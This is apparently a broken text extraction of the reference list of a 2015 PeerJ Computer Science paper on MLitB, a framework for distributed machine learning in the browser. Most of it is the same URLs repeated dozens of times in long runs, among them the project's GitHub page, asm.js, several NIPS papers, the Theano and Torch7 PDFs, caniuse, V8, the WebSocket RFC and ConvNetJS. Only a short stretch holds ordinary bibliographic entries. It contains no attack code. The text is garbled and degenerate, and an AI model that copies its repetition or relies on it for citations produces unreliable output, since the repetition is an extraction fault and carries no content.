http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://www.ics.uci.edu/~babaks/Site/Home_files/icml2014_Ahn.pdf http://dx.doi.org/10.1145/581571.581573 http://asmjs.org http://asmjs.org http://asmjs.org http://asmjs.org http://asmjs.org http://asmjs.org http://asmjs.org http://asmjs.org http://asmjs.org http://asmjs.org http://asmjs.org http://asmjs.org http://asmjs.org http://asmjs.org http://asmjs.org http://asmjs.org http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/5484-do-deep-nets-really-need-to-be-deep http://arxiv.org/abs/1409.0473 http://arxiv.org/abs/1211.5590 http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy2010.pdf http://dx.doi.org/10.7717/peerj-cs.11 Bottou L. 2010. Large-scale machine learning with stochastic gradient descent. In: Proceedings of COMPSTAT’2010. New York: Springer, 177–186. Boyd S, Ghosh A, Prabhakar B, Shah D. 2006. Randomized gossip algorithms. IEEE Transactions on Information Theory 52(6):2508–2530 DOI 10.1109/TIT.2006.874516. Can I Use. 2014. Javascript API support comparison. Available at http://caniuse.com/#cats=JS API (accessed 26 November 2014). Casadevall A, Fang FC. 2010. Reproducible science. Infection and Immunity 78(12):4972–4975 DOI 10.1128/IAI.00908-10. Chrome V8. 2014. Chrome V8: google’s high performance, open source, JavaScript engine. Available at https://developers.google.com/v8 (accessed 26 November 2014). Coates A, Huval B, Wang T, Wu D, Catanzaro B, Andrew N. 2013. Deep learning with cots hpc systems. In: Proceedings of The 30th international conference on machine learning. 1337–1345. Collobert R, Kavukcuoglu K, Farabet C. 2011. Torch7: a matlab-like environment for machine learning. In: BigLearn, NIPS workshop. Number EPFL-CONF-192376. Available at http://ronan. collobert.com/pub/matos/2011 torch7 nipsw.pdf. Cushing R, Putra GHH, Koulouzis S, Belloum A, Bubak M, De Laat C. 2013. Distributed computing on an ensemble of browsers. Internet Computing, IEEE 17(5):54–61 DOI 10.1109/MIC.2013.3. Dean J, Corrado G, Monga R, Chen K, Devin M, Mao M, Ranzato M, Senior A, Tucker P, Yang K, Le QV, Ng AY. 2012. Large scale distributed deep networks. In: Pereira F, Burges CJC, Bottou L, Weinberger KQ, eds. Advances in neural information processing systems. Red Hook: Curran Associates, 1223–1231. Dean J, Ghemawat S. 2008. MapReduce: simplified data processing on large clusters. Communications of the ACM 51(1):107–113 DOI 10.1145/1327452.1327492. Duchi J, Hazan E, Singer Y. 2011. Adaptive subgradient methods for online learning and stochastic optimization. The Journal of Machine Learning Research 12:2121–2159. Dwork C. 2008. Differential privacy: a survey of results. In: Theory and applications of models of computation. New York: Springer, 1–19. Han S, Ng WK, Wan L, Lee V. 2010. Privacy-preserving gradient-descent methods. IEEE Transactions on Knowledge and Data Engineering 22(6):884–899 DOI 10.1109/TKDE.2009.153. Hinton G, Deng L, Yu D, Dahl GE, Mohamed A, Jaitly N, Senior A, Vanhoucke V, Nguyen P, Sainath TN, Kingsbury B. 2012. Deep neural networks for acoustic modeling in speech recognition: the shared views of four research groups. IEEE Signal Processing Magazine 29(6):82–97 DOI 10.1109/MSP.2012.2205597. IETF. 2011. The websocket protocol. Available at http://tools.ietf.org/html/rfc6455 (accessed 4 December 2014). Jia Y, Shelhamer E, Donahue J, Karayev S, Long J, Girshick R, Guadarrama S, Darrell T. 2014. Caffe: convolutional architecture for fast feature embedding. ArXiv preprint. arXiv:1408.5093. Karpathy A. 2014. ConvNetJS Deep Learning in the browser. Available at http://www.convnetjs. com (accessed 9 July 2014). Khan F, Foley-Bourgon V, Kathrotia S, Lavoie E, Hendren L. 2014. Using Javascript and WebCL for numerical computations: a comparative study of native and web technologies. In: Proceedings of the 10th ACM symposium on dynamic languages. New York: ACM, 91–102. Krizhevsky A, Sutskever I, Hinton GE. 2012. Imagenet classification with deep convolutional neural networks. In: Advances in neural information processing systems. Available at http://papers. nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks. Meeds et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.11 23/24 https://peerj.com/computer-science/ http://dx.doi.org/10.1109/TIT.2006.874516 http://caniuse.com/#cats=JS_API http://caniuse.com/#cats=JS_API http://caniuse.com/#cats=JS_API http://caniuse.com/#cats=JS_API http://caniuse.com/#cats=JS_API http://caniuse.com/#cats=JS_API http://caniuse.com/#cats=JS_API http://caniuse.com/#cats=JS_API http://caniuse.com/#cats=JS_API http://caniuse.com/#cats=JS_API http://caniuse.com/#cats=JS_API http://caniuse.com/#cats=JS_API http://caniuse.com/#cats=JS_API http://caniuse.com/#cats=JS_API http://caniuse.com/#cats=JS_API http://caniuse.com/#cats=JS_API http://caniuse.com/#cats=JS_API http://caniuse.com/#cats=JS_API http://caniuse.com/#cats=JS_API http://caniuse.com/#cats=JS_API http://caniuse.com/#cats=JS_API http://caniuse.com/#cats=JS_API http://caniuse.com/#cats=JS_API http://caniuse.com/#cats=JS_API http://caniuse.com/#cats=JS_API http://caniuse.com/#cats=JS_API http://caniuse.com/#cats=JS_API http://caniuse.com/#cats=JS_API http://caniuse.com/#cats=JS_API http://caniuse.com/#cats=JS_API http://caniuse.com/#cats=JS_API http://dx.doi.org/10.1128/IAI.00908-10 https://developers.google.com/v8 https://developers.google.com/v8 https://developers.google.com/v8 https://developers.google.com/v8 https://developers.google.com/v8 https://developers.google.com/v8 https://developers.google.com/v8 https://developers.google.com/v8 https://developers.google.com/v8 https://developers.google.com/v8 https://developers.google.com/v8 https://developers.google.com/v8 https://developers.google.com/v8 https://developers.google.com/v8 https://developers.google.com/v8 https://developers.google.com/v8 https://developers.google.com/v8 https://developers.google.com/v8 https://developers.google.com/v8 https://developers.google.com/v8 https://developers.google.com/v8 https://developers.google.com/v8 https://developers.google.com/v8 https://developers.google.com/v8 https://developers.google.com/v8 https://developers.google.com/v8 https://developers.google.com/v8 https://developers.google.com/v8 https://developers.google.com/v8 https://developers.google.com/v8 https://developers.google.com/v8 https://developers.google.com/v8 http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://ronan.collobert.com/pub/matos/2011_torch7_nipsw.pdf http://dx.doi.org/10.1109/MIC.2013.3 http://dx.doi.org/10.1145/1327452.1327492 http://dx.doi.org/10.1109/TKDE.2009.153 http://dx.doi.org/10.1109/MSP.2012.2205597 http://tools.ietf.org/html/rfc6455 http://tools.ietf.org/html/rfc6455 http://tools.ietf.org/html/rfc6455 http://tools.ietf.org/html/rfc6455 http://tools.ietf.org/html/rfc6455 http://tools.ietf.org/html/rfc6455 http://tools.ietf.org/html/rfc6455 http://tools.ietf.org/html/rfc6455 http://tools.ietf.org/html/rfc6455 http://tools.ietf.org/html/rfc6455 http://tools.ietf.org/html/rfc6455 http://tools.ietf.org/html/rfc6455 http://tools.ietf.org/html/rfc6455 http://tools.ietf.org/html/rfc6455 http://tools.ietf.org/html/rfc6455 http://tools.ietf.org/html/rfc6455 http://tools.ietf.org/html/rfc6455 http://tools.ietf.org/html/rfc6455 http://tools.ietf.org/html/rfc6455 http://tools.ietf.org/html/rfc6455 http://tools.ietf.org/html/rfc6455 http://tools.ietf.org/html/rfc6455 http://tools.ietf.org/html/rfc6455 http://tools.ietf.org/html/rfc6455 http://tools.ietf.org/html/rfc6455 http://tools.ietf.org/html/rfc6455 http://tools.ietf.org/html/rfc6455 http://tools.ietf.org/html/rfc6455 http://tools.ietf.org/html/rfc6455 http://tools.ietf.org/html/rfc6455 http://tools.ietf.org/html/rfc6455 http://tools.ietf.org/html/rfc6455 http://tools.ietf.org/html/rfc6455 http://tools.ietf.org/html/rfc6455 http://arxiv.org/abs/1408.5093 http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks 